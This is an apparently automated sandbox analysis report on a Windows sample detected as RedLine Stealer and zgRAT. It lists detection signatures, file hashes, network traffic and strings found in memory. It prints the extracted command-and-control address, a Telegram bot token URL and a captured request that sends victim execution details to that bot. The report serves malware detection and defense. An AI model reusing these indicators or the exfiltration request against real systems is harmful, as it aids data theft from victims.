Windows Analysis Report
SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Analysis ID: 854232
MD5: fffbb8afb4ca73ec2063d73427c847fe
SHA1: 965e02f47384c64307890e315b8ac9e72d6b9cb5
SHA256: 20e37644d93e86bec12b2c23abc6d0089ba83494189047f137fc19890c82d1fc
Tags: exe
Infos:

Detection

RedLine, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Snort IDS alert for network traffic
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Encrypted powershell cmdline option found
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Name Description Attribution Blogpost URLs Link
zgRAT No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection
barindex
Found malware configuration
Source: InstallUtil.exe.6844.5.memstrmin Malware Configuration Extractor: RedLine {"C2 url": "5.75.134.144:7985"}
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.1496.0.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5726741061:AAElVs4Kh5cFjADvNi4pSC5O6l_EdthxhCY/sendMessage"}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe ReversingLabs: Detection: 27%
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Virustotal: Detection: 28% Perma Link
Machine Learning detection for sample
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.2c00000.0.unpack Avira: Label: TR/Patched.Ren.Gen
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49696 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log Jump to behavior
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: .pdb source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.5:49697 -> 5.75.134.144:7985
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 5.75.134.144:7985
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /bot5726741061:AAElVs4Kh5cFjADvNi4pSC5O6l_EdthxhCY/sendMessage?chat_id=5701072641&text=%0D%0A%F0%9F%94%8A%20*NEW%20EXECUTION*%0D%0A1%EF%B8%8F%E2%83%A3%20User%20=%20user%0D%0A2%EF%B8%8F%E2%83%A3%20Date%20UTC%20=%204/26/2023%204:39:15%20PM%0D%0A3%EF%B8%8F%E2%83%A3%20File%20=%20SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe%0D%0A HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49697 -> 5.75.134.144:7985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.134.144
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.440409078.0000000005958000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.441415964.00000000010EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: InstallUtil.exe, 00000005.00000002.569356286.00000000032B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: InstallUtil.exe, 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
